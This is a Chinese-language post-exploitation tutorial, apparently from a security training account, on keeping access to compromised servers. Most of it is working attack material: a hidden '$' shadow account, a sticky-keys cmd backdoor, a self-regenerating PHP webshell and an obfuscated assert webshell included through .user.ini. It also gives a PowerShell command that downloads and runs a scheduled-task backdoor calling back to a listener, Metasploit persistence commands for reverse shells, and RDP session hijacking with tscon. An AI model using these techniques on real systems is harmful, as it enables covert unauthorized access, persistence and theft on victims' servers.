本文转自公众号: 洛米唯熊
简介
何为“后渗透”?就是获取到受害者服务器的权限后,再继续对受害者服务器进行长期攻击或者信息获取的一种持续性手段。常见的手段有,后门、影子账户、会话劫持等等。
很多同学在学习metasploit的时候,最大的目标就是拿到meterpreter了吧?关于如何拿到meterpreter的权限在合天网安实验室已经有相关的实验——Metasploit后渗透入门,可是拿到meterpreter之后,我们该做些什么,又能做些什么呢?本实验将会和大家一同学习拿到meterpreter后的渗透学习,这一阶段也被称为后渗透阶段。长按下列二维码,可预览学习!
实验
一、影子账户
原理:创建一个跟普通用户一样的用户,但是只能在注册表中才能查看到的用户。
net user luomiweixiong$ /addnet user
二、shift后门
原理:将按5下shift时调用的“粘滞键”替换为“CMD”
将 C:\WINDOWS\system32\dllcache\sethc.exe删除,这个文件夹中放着缓存,如果不 删除就会自动变回去
找到 C:\WINDOWS\system32\cmd.exe 将其复制并将名称更改为 sethc.exe,放回文 件夹中
这次按5次shift键就可以打开cmd了
三、反弹加入自启(鸡肋)
1、NC反弹
2、Bash反弹
3、perl反弹
4、Python反弹
5、PHP反弹
6、等等
将反弹的脚本写入到启动项里,当受害者启动服务器时,自动反弹shell。弊端就是要一直监听,还要有公网的IP。
四、隐藏后门文件
1、将木马文件属性改为“隐藏”
2、将木马名字进行伪装处理,伪装成系统文件或者报错文件。修改时间跟系统文件时间类似。
3、利用循环不死马(举栗子)
<?phpset_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while(1){file_put_contents('phpinf0.php','<?php $a=array($_REQUEST["kk"]=>"3");$b=array_keys($a)[0];eval($b);?>');sleep(8);}?>
说明:此脚本会每8秒不断的向服务器生成一个“phpinf0.php”的一句话木马.
五、利用.user.ini文件自动包含木马文件
在“.user.ini”文件写入
auto_prepend_file=luomiweixiong.gif
在“luomiweixiong.gif”文件写入一句话木马
<!–?php $a = “a”.”s”.”s”.”e”.”r”.”t”;$a($_POST[“kk”]); ?–>
利用成功前提下必须有以下三个文件,
1、PHP的正常文件
2、修改后.user.ini文件
3、luomiweixiong.gif木马
说明:在限制了PHP文件上传的条件下,上传ini文件,再进行文件包含拿shell.
注:.user.ini只有在php5.3以后可以用 生效时间是看配置文件里的user_ini.cache_ttl 默认一般是300秒,理论上是php5.3以后都可以,但有些集成环境包含会乱码 例如phpstudy。
六、Powershell权限维持
参考此PowerShell脚本
https://github.com/re4lity/Schtasks-Backdoor
利用代码:
powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.124.25/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.124.14 -port 666 -time 2"
说明:
1、192.168.124.25为受害者IP,前提是要把PowerShell脚本放到受害者服务器能访问到的根路径。
2、192.168.124.14为接收反弹回来的IP,可用NC监听反弹回来的shell
七、metasploit权限维持
1、Persistence模块
前提是利用MSF获取到了对方的会话
run persistence -U -i 12 -p 6666 -r 192.168.124.14
说明
-i 目标自动回连时间
-p 设置目标反向连接的端口
-r 设置目标反向连接的ip地址
-U 设置目标自启动
加入自启动后,就算受害者机器再次启动也能弹回shell
2、metsvc 模块
前提是利用MSF获取到了对方的会话
run metsvc -A
说明:
-A 自动启动一个匹配的 multi/handler 以连接到该服务
该模块是在受害者服务器开启了一个“Meterpreter”服务
下次攻击者可以利用metsvc_bind_tcp监听模块就可以再次获取到shell
监听端口为31337
八、会话劫持
说明:RDP会话劫持是在不知道另一用户密码的条件下进行切换用户登录
query user
sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"
net start sesshijack
题外话
维护权限还有很多种方法,我这里只是举几个栗子🌰。
别忘了投稿哦
大家有好的技术原创文章
欢迎投稿至邮箱:[email protected]
合天会根据文章的时效、新颖、文笔、实用等多方面评判给予200元-800元不等的稿费哦
有才能的你快来投稿吧!
了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦!